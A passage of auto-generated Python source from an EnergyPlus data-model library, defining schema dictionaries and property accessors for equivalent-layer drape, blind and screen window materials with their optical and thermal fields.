float: the value of `drape_material_infrared_transmittance` or None if not set
"""
return self["Drape Material Infrared Transmittance"]
@drape_material_infrared_transmittance.setter
def drape_material_infrared_transmittance(self, value=0.05):
"""Corresponds to IDD field `Drape Material Infrared Transmittance`"""
self["Drape Material Infrared Transmittance"] = value
@property
def front_side_drape_material_infrared_emissivity(self):
"""field `Front Side Drape Material Infrared Emissivity`
| Front side long-wave emissivity of the drape fabric at zero shade openness.
| Openness fraction specified above is used to calculate the effective
| emissivity value.
| Units: dimensionless
| Default value: 0.87
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Drape Material Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_drape_material_infrared_emissivity` or None if not set
"""
return self["Front Side Drape Material Infrared Emissivity"]
@front_side_drape_material_infrared_emissivity.setter
def front_side_drape_material_infrared_emissivity(self, value=0.87):
"""Corresponds to IDD field `Front Side Drape Material Infrared
Emissivity`"""
self["Front Side Drape Material Infrared Emissivity"] = value
@property
def back_side_drape_material_infrared_emissivity(self):
"""field `Back Side Drape Material Infrared Emissivity`
| Back side long-wave emissivity of the drape fabric at zero shade openness.
| Openness fraction specified above is used to calculate the effective
| emissivity value.
| Units: dimensionless
| Default value: 0.87
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Drape Material Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_drape_material_infrared_emissivity` or None if not set
"""
return self["Back Side Drape Material Infrared Emissivity"]
@back_side_drape_material_infrared_emissivity.setter
def back_side_drape_material_infrared_emissivity(self, value=0.87):
"""Corresponds to IDD field `Back Side Drape Material Infrared
Emissivity`"""
self["Back Side Drape Material Infrared Emissivity"] = value
@property
def width_of_pleated_fabric(self):
"""field `Width of Pleated Fabric`
| Width of the pleated section of the draped fabric. If the drape fabric is
| unpleated or is flat, then the pleated section width is set to zero.
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Width of Pleated Fabric`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `width_of_pleated_fabric` or None if not set
"""
return self["Width of Pleated Fabric"]
@width_of_pleated_fabric.setter
def width_of_pleated_fabric(self, value=None):
"""Corresponds to IDD field `Width of Pleated Fabric`"""
self["Width of Pleated Fabric"] = value
@property
def length_of_pleated_fabric(self):
"""field `Length of Pleated Fabric`
| Length of the pleated section of the draped fabric. If the drape fabric is
| unpleated or is flat, then the pleated section length is set to zero.
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Length of Pleated Fabric`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `length_of_pleated_fabric` or None if not set
"""
return self["Length of Pleated Fabric"]
@length_of_pleated_fabric.setter
def length_of_pleated_fabric(self, value=None):
"""Corresponds to IDD field `Length of Pleated Fabric`"""
self["Length of Pleated Fabric"] = value
class WindowMaterialBlindEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Blind:EquivalentLayer`
Window equivalent layer blind slat optical and thermal properties.
The model assumes that slats are thin and flat, applies correction
empirical correlation to account for curvature effect. Slats are
assumed to transmit and reflect diffusely.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'slat orientation',
{'name': u'Slat Orientation',
'pyname': u'slat_orientation',
'default': u'Horizontal',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Horizontal',
u'Vertical'],
'autocalculatable': False,
'type': 'alpha'}),
(u'slat width',
{'name': u'Slat Width',
'pyname': u'slat_width',
'minimum>': 0.0,
'maximum': 0.025,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat separation',
{'name': u'Slat Separation',
'pyname': u'slat_separation',
'minimum>': 0.0,
'maximum': 0.025,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat crown',
{'name': u'Slat Crown',
'pyname': u'slat_crown',
'default': 0.0015,
'maximum': 0.00156,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'slat angle',
{'name': u'Slat Angle',
'pyname': u'slat_angle',
'default': 45.0,
'maximum': 180.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'deg'}),
(u'front side slat beam-diffuse solar transmittance',
{'name': u'Front Side Slat Beam-Diffuse Solar Transmittance',
'pyname': u'front_side_slat_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side slat beam-diffuse solar transmittance',
{'name': u'Back Side Slat Beam-Diffuse Solar Transmittance',
'pyname': u'back_side_slat_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side slat beam-diffuse solar reflectance',
{'name': u'Front Side Slat Beam-Diffuse Solar Reflectance',
'pyname': u'front_side_slat_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat beam-diffuse solar reflectance',
{'name': u'Back Side Slat Beam-Diffuse Solar Reflectance',
'pyname': u'back_side_slat_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side slat beam-diffuse visible transmittance',
{'name': u'Front Side Slat Beam-Diffuse Visible Transmittance',
'pyname': u'front_side_slat_beamdiffuse_visible_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat beam-diffuse visible transmittance',
{'name': u'Back Side Slat Beam-Diffuse Visible Transmittance',
'pyname': u'back_side_slat_beamdiffuse_visible_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side slat beam-diffuse visible reflectance',
{'name': u'Front Side Slat Beam-Diffuse Visible Reflectance',
'pyname': u'front_side_slat_beamdiffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat beam-diffuse visible reflectance',
{'name': u'Back Side Slat Beam-Diffuse Visible Reflectance',
'pyname': u'back_side_slat_beamdiffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'slat diffuse-diffuse solar transmittance',
{'name': u'Slat Diffuse-Diffuse Solar Transmittance',
'pyname': u'slat_diffusediffuse_solar_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side slat diffuse-diffuse solar reflectance',
{'name': u'Front Side Slat Diffuse-Diffuse Solar Reflectance',
'pyname': u'front_side_slat_diffusediffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat diffuse-diffuse solar reflectance',
{'name': u'Back Side Slat Diffuse-Diffuse Solar Reflectance',
'pyname': u'back_side_slat_diffusediffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'slat diffuse-diffuse visible transmittance',
{'name': u'Slat Diffuse-Diffuse Visible Transmittance',
'pyname': u'slat_diffusediffuse_visible_transmittance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat diffuse-diffuse visible reflectance',
{'name': u'Front Side Slat Diffuse-Diffuse Visible Reflectance',
'pyname': u'front_side_slat_diffusediffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat diffuse-diffuse visible reflectance',
{'name': u'Back Side Slat Diffuse-Diffuse Visible Reflectance',
'pyname': u'back_side_slat_diffusediffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'slat infrared transmittance',
{'name': u'Slat Infrared Transmittance',
'pyname': u'slat_infrared_transmittance',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side slat infrared emissivity',
{'name': u'Front Side Slat Infrared Emissivity',
'pyname': u'front_side_slat_infrared_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side slat infrared emissivity',
{'name': u'Back Side Slat Infrared Emissivity',
'pyname': u'back_side_slat_infrared_emissivity',
'default': 0.9,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'slat angle control',
{'name': u'Slat Angle Control',
'pyname': u'slat_angle_control',
'default': u'FixedSlatAngle',
'required-field': False,
'autosizable': False,
'accepted-values': [u'FixedSlatAngle',
u'MaximizeSolar',
u'BlockBeamSolar'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 10,
'name': u'WindowMaterial:Blind:EquivalentLayer',
'pyname': u'WindowMaterialBlindEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def slat_orientation(self):
"""field `Slat Orientation`
| Default value: Horizontal
Args:
value (str): value for IDD Field `Slat Orientation`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `slat_orientation` or None if not set
"""
return self["Slat Orientation"]
@slat_orientation.setter
def slat_orientation(self, value="Horizontal"):
"""Corresponds to IDD field `Slat Orientation`"""
self["Slat Orientation"] = value
@property
def slat_width(self):
"""field `Slat Width`
| Units: m
| IP-Units: in
| value <= 0.025
Args:
value (float): value for IDD Field `Slat Width`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_width` or None if not set
"""
return self["Slat Width"]
@slat_width.setter
def slat_width(self, value=None):
"""Corresponds to IDD field `Slat Width`"""
self["Slat Width"] = value
@property
def slat_separation(self):
"""field `Slat Separation`
| Distance between adjacent slat faces
| Units: m
| IP-Units: in
| value <= 0.025
Args:
value (float): value for IDD Field `Slat Separation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_separation` or None if not set
"""
return self["Slat Separation"]
@slat_separation.setter
def slat_separation(self, value=None):
"""Corresponds to IDD field `Slat Separation`"""
self["Slat Separation"] = value
@property
def slat_crown(self):
"""field `Slat Crown`
| Perpendicular length between the cord and the curve.
| Slat is assumed to be rectangular in cross section
| and flat. Crown=0.0625x"Slat width"
| Units: m
| IP-Units: in
| Default value: 0.0015
| value <= 0.00156
Args:
value (float): value for IDD Field `Slat Crown`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_crown` or None if not set
"""
return self["Slat Crown"]
@slat_crown.setter
def slat_crown(self, value=0.0015):
"""Corresponds to IDD field `Slat Crown`"""
self["Slat Crown"] = value
@property
def slat_angle(self):
"""field `Slat Angle`
| Units: deg
| Default value: 45.0
| value <= 180.0
Args:
value (float): value for IDD Field `Slat Angle`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_angle` or None if not set
"""
return self["Slat Angle"]
@slat_angle.setter
def slat_angle(self, value=45.0):
"""Corresponds to IDD field `Slat Angle`"""
self["Slat Angle"] = value
@property
def front_side_slat_beamdiffuse_solar_transmittance(self):
"""field `Front Side Slat Beam-Diffuse Solar Transmittance`
| The front side beam-diffuse solar transmittance of the slat at normal
| incidence averaged over the entire spectrum of solar radiation.
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Front Side Slat Beam-Diffuse Solar Transmittance"]
@front_side_slat_beamdiffuse_solar_transmittance.setter
def front_side_slat_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Beam-Diffuse Solar Transmittance`
"""
self["Front Side Slat Beam-Diffuse Solar Transmittance"] = value
@property
def back_side_slat_beamdiffuse_solar_transmittance(self):
"""field `Back Side Slat Beam-Diffuse Solar Transmittance`
| The back side beam-diffuse solar transmittance of the slat at normal
| incidence averaged over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beamdiffuse_solar_transmittance` or None if not set
"""
return self["Back Side Slat Beam-Diffuse Solar Transmittance"]
@back_side_slat_beamdiffuse_solar_transmittance.setter
def back_side_slat_beamdiffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Beam-Diffuse Solar Transmittance`
"""
self["Back Side Slat Beam-Diffuse Solar Transmittance"] = value
@property
def front_side_slat_beamdiffuse_solar_reflectance(self):
"""field `Front Side Slat Beam-Diffuse Solar Reflectance`
| The front side beam-diffuse solar reflectance of the slat at normal
| incidence averaged over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Front Side Slat Beam-Diffuse Solar Reflectance"]
@front_side_slat_beamdiffuse_solar_reflectance.setter
def front_side_slat_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Beam-Diffuse Solar Reflectance`
"""
self["Front Side Slat Beam-Diffuse Solar Reflectance"] = value
@property
def back_side_slat_beamdiffuse_solar_reflectance(self):
"""field `Back Side Slat Beam-Diffuse Solar Reflectance`
| The back side beam-diffuse solar reflectance of the slat at normal
| incidence averaged over the entire spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beamdiffuse_solar_reflectance` or None if not set
"""
return self["Back Side Slat Beam-Diffuse Solar Reflectance"]
@back_side_slat_beamdiffuse_solar_reflectance.setter
def back_side_slat_beamdiffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Beam-Diffuse Solar Reflectance`
"""
self["Back Side Slat Beam-Diffuse Solar Reflectance"] = value
@property
def front_side_slat_beamdiffuse_visible_transmittance(self):
"""field `Front Side Slat Beam-Diffuse Visible Transmittance`
| The front side beam-diffuse visible transmittance of the slat
| at normal incidence averaged over the visible spectrum range
| of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam-Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beamdiffuse_visible_transmittance` or None if not set
"""
return self["Front Side Slat Beam-Diffuse Visible Transmittance"]
@front_side_slat_beamdiffuse_visible_transmittance.setter
def front_side_slat_beamdiffuse_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Beam-Diffuse Visible Transmittance`
"""
self["Front Side Slat Beam-Diffuse Visible Transmittance"] = value
@property
def back_side_slat_beamdiffuse_visible_transmittance(self):
"""field `Back Side Slat Beam-Diffuse Visible Transmittance`
| The back side beam-diffuse visible transmittance of the slat
| at normal incidence averaged over the visible spectrum range
| of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam-Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beamdiffuse_visible_transmittance` or None if not set
"""
return self["Back Side Slat Beam-Diffuse Visible Transmittance"]
@back_side_slat_beamdiffuse_visible_transmittance.setter
def back_side_slat_beamdiffuse_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Beam-Diffuse Visible Transmittance`
"""
self["Back Side Slat Beam-Diffuse Visible Transmittance"] = value
@property
def front_side_slat_beamdiffuse_visible_reflectance(self):
"""field `Front Side Slat Beam-Diffuse Visible Reflectance`
| The front side beam-diffuse visible reflectance of the slat
| at normal incidence averaged over the visible spectrum range
| of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Beam-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_beamdiffuse_visible_reflectance` or None if not set
"""
return self["Front Side Slat Beam-Diffuse Visible Reflectance"]
@front_side_slat_beamdiffuse_visible_reflectance.setter
def front_side_slat_beamdiffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Beam-Diffuse Visible Reflectance`
"""
self["Front Side Slat Beam-Diffuse Visible Reflectance"] = value
@property
def back_side_slat_beamdiffuse_visible_reflectance(self):
"""field `Back Side Slat Beam-Diffuse Visible Reflectance`
| The back side beam-diffuse visible reflectance of the slat
| at normal incidence averaged over the visible spectrum range
| of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Beam-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_beamdiffuse_visible_reflectance` or None if not set
"""
return self["Back Side Slat Beam-Diffuse Visible Reflectance"]
@back_side_slat_beamdiffuse_visible_reflectance.setter
def back_side_slat_beamdiffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Beam-Diffuse Visible Reflectance`
"""
self["Back Side Slat Beam-Diffuse Visible Reflectance"] = value
@property
def slat_diffusediffuse_solar_transmittance(self):
"""field `Slat Diffuse-Diffuse Solar Transmittance`
| The beam-diffuse solar transmittance of the slat averaged
| over the entire solar spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Slat Diffuse-Diffuse Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_diffusediffuse_solar_transmittance` or None if not set
"""
return self["Slat Diffuse-Diffuse Solar Transmittance"]
@slat_diffusediffuse_solar_transmittance.setter
def slat_diffusediffuse_solar_transmittance(self, value=None):
""" Corresponds to IDD field `Slat Diffuse-Diffuse Solar Transmittance`
"""
self["Slat Diffuse-Diffuse Solar Transmittance"] = value
@property
def front_side_slat_diffusediffuse_solar_reflectance(self):
"""field `Front Side Slat Diffuse-Diffuse Solar Reflectance`
| The front side beam-diffuse solar reflectance of the slat
| averaged over the entire solar spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Diffuse-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_diffusediffuse_solar_reflectance` or None if not set
"""
return self["Front Side Slat Diffuse-Diffuse Solar Reflectance"]
@front_side_slat_diffusediffuse_solar_reflectance.setter
def front_side_slat_diffusediffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Diffuse-Diffuse Solar Reflectance`
"""
self["Front Side Slat Diffuse-Diffuse Solar Reflectance"] = value
@property
def back_side_slat_diffusediffuse_solar_reflectance(self):
"""field `Back Side Slat Diffuse-Diffuse Solar Reflectance`
| The back side beam-diffuse solar reflectance of the slat
| averaged over the entire solar spectrum of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Diffuse-Diffuse Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_diffusediffuse_solar_reflectance` or None if not set
"""
return self["Back Side Slat Diffuse-Diffuse Solar Reflectance"]
@back_side_slat_diffusediffuse_solar_reflectance.setter
def back_side_slat_diffusediffuse_solar_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Diffuse-Diffuse Solar Reflectance`
"""
self["Back Side Slat Diffuse-Diffuse Solar Reflectance"] = value
@property
def slat_diffusediffuse_visible_transmittance(self):
"""field `Slat Diffuse-Diffuse Visible Transmittance`
| The beam-diffuse visible transmittance of the slat averaged
| over the visible spectrum range of solar radiation.
| value < 1.0
Args:
value (float): value for IDD Field `Slat Diffuse-Diffuse Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_diffusediffuse_visible_transmittance` or None if not set
"""
return self["Slat Diffuse-Diffuse Visible Transmittance"]
@slat_diffusediffuse_visible_transmittance.setter
def slat_diffusediffuse_visible_transmittance(self, value=None):
""" Corresponds to IDD field `Slat Diffuse-Diffuse Visible Transmittance`
"""
self["Slat Diffuse-Diffuse Visible Transmittance"] = value
@property
def front_side_slat_diffusediffuse_visible_reflectance(self):
"""field `Front Side Slat Diffuse-Diffuse Visible Reflectance`
| The front side beam-diffuse visible reflectance of the slat
| averaged over the visible spectrum range of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Diffuse-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_diffusediffuse_visible_reflectance` or None if not set
"""
return self["Front Side Slat Diffuse-Diffuse Visible Reflectance"]
@front_side_slat_diffusediffuse_visible_reflectance.setter
def front_side_slat_diffusediffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Front Side Slat Diffuse-Diffuse Visible Reflectance`
"""
self["Front Side Slat Diffuse-Diffuse Visible Reflectance"] = value
@property
def back_side_slat_diffusediffuse_visible_reflectance(self):
"""field `Back Side Slat Diffuse-Diffuse Visible Reflectance`
| The back side beam-diffuse visible reflectance of the slat
| averaged over the visible spectrum range of solar radiation.
| Units: dimensionless
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Diffuse-Diffuse Visible Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_diffusediffuse_visible_reflectance` or None if not set
"""
return self["Back Side Slat Diffuse-Diffuse Visible Reflectance"]
@back_side_slat_diffusediffuse_visible_reflectance.setter
def back_side_slat_diffusediffuse_visible_reflectance(self, value=None):
""" Corresponds to IDD field `Back Side Slat Diffuse-Diffuse Visible Reflectance`
"""
self["Back Side Slat Diffuse-Diffuse Visible Reflectance"] = value
@property
def slat_infrared_transmittance(self):
"""field `Slat Infrared Transmittance`
| Long-wave hemispherical transmittance of the slat material.
| Assumed to be the same for both sides of the slat.
| value < 1.0
Args:
value (float): value for IDD Field `Slat Infrared Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `slat_infrared_transmittance` or None if not set
"""
return self["Slat Infrared Transmittance"]
@slat_infrared_transmittance.setter
def slat_infrared_transmittance(self, value=None):
"""Corresponds to IDD field `Slat Infrared Transmittance`"""
self["Slat Infrared Transmittance"] = value
@property
def front_side_slat_infrared_emissivity(self):
"""field `Front Side Slat Infrared Emissivity`
| Front side long-wave hemispherical emissivity of the slat material.
| Units: dimensionless
| Default value: 0.9
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Slat Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_slat_infrared_emissivity` or None if not set
"""
return self["Front Side Slat Infrared Emissivity"]
@front_side_slat_infrared_emissivity.setter
def front_side_slat_infrared_emissivity(self, value=0.9):
"""Corresponds to IDD field `Front Side Slat Infrared Emissivity`"""
self["Front Side Slat Infrared Emissivity"] = value
@property
def back_side_slat_infrared_emissivity(self):
"""field `Back Side Slat Infrared Emissivity`
| Back side long-wave hemispherical emissivity of the slat material.
| Units: dimensionless
| Default value: 0.9
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Slat Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_slat_infrared_emissivity` or None if not set
"""
return self["Back Side Slat Infrared Emissivity"]
@back_side_slat_infrared_emissivity.setter
def back_side_slat_infrared_emissivity(self, value=0.9):
"""Corresponds to IDD field `Back Side Slat Infrared Emissivity`"""
self["Back Side Slat Infrared Emissivity"] = value
@property
def slat_angle_control(self):
"""field `Slat Angle Control`
| Used only if slat angle control is desired to either maximize solar
| gain (MaximizeSolar), maximize visibility while eliminating beam solar
| radiation (BlockBeamSolar), or fixed slate angle (FixedSlatAngle).
| If FixedSlatAngle is selected, the slat angle entered above is used.
| Default value: FixedSlatAngle
Args:
value (str): value for IDD Field `Slat Angle Control`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `slat_angle_control` or None if not set
"""
return self["Slat Angle Control"]
@slat_angle_control.setter
def slat_angle_control(self, value="FixedSlatAngle"):
"""Corresponds to IDD field `Slat Angle Control`"""
self["Slat Angle Control"] = value
class WindowMaterialScreenEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Screen:EquivalentLayer`
Equivalent layer window screen physical properties. Can only be
located on the exterior side of a window construction.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'screen beam-beam solar transmittance',
{'name': u'Screen Beam-Beam Solar Transmittance',
'pyname': u'screen_beambeam_solar_transmittance',
'default': 'autocalculate',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse solar transmittance',
{'name': u'Screen Beam-Diffuse Solar Transmittance',
'pyname': u'screen_beamdiffuse_solar_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse solar reflectance',
{'name': u'Screen Beam-Diffuse Solar Reflectance',
'pyname': u'screen_beamdiffuse_solar_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-beam visible transmittance',
{'name': u'Screen Beam-Beam Visible Transmittance',
'pyname': u'screen_beambeam_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse visible transmittance',
{'name': u'Screen Beam-Diffuse Visible Transmittance',
'pyname': u'screen_beamdiffuse_visible_transmittance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen beam-diffuse visible reflectance',
{'name': u'Screen Beam-Diffuse Visible Reflectance',
'pyname': u'screen_beamdiffuse_visible_reflectance',
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen infrared transmittance',
{'name': u'Screen Infrared Transmittance',
'pyname': u'screen_infrared_transmittance',
'default': 0.02,
'maximum<': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'screen infrared emissivity',
{'name': u'Screen Infrared Emissivity',
'pyname': u'screen_infrared_emissivity',
'default': 0.93,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'screen wire spacing',
{'name': u'Screen Wire Spacing',
'pyname': u'screen_wire_spacing',
'default': 0.025,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'screen wire diameter',
{'name': u'Screen Wire Diameter',
'pyname': u'screen_wire_diameter',
'default': 0.005,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 4,
'name': u'WindowMaterial:Screen:EquivalentLayer',
'pyname': u'WindowMaterialScreenEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Enter a unique name for this window screen material.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def screen_beambeam_solar_transmittance(self):
"""field `Screen Beam-Beam Solar Transmittance`
| The beam-beam transmittance of the screen material at normal incidence.
| This input field is the same as the material openness area fraction
| and can be autocalculated from the wire spacing and wire and diameter.
| Assumed to be the same for both sides of the screen.
| Units: dimensionless
| Default value: "autocalculate"
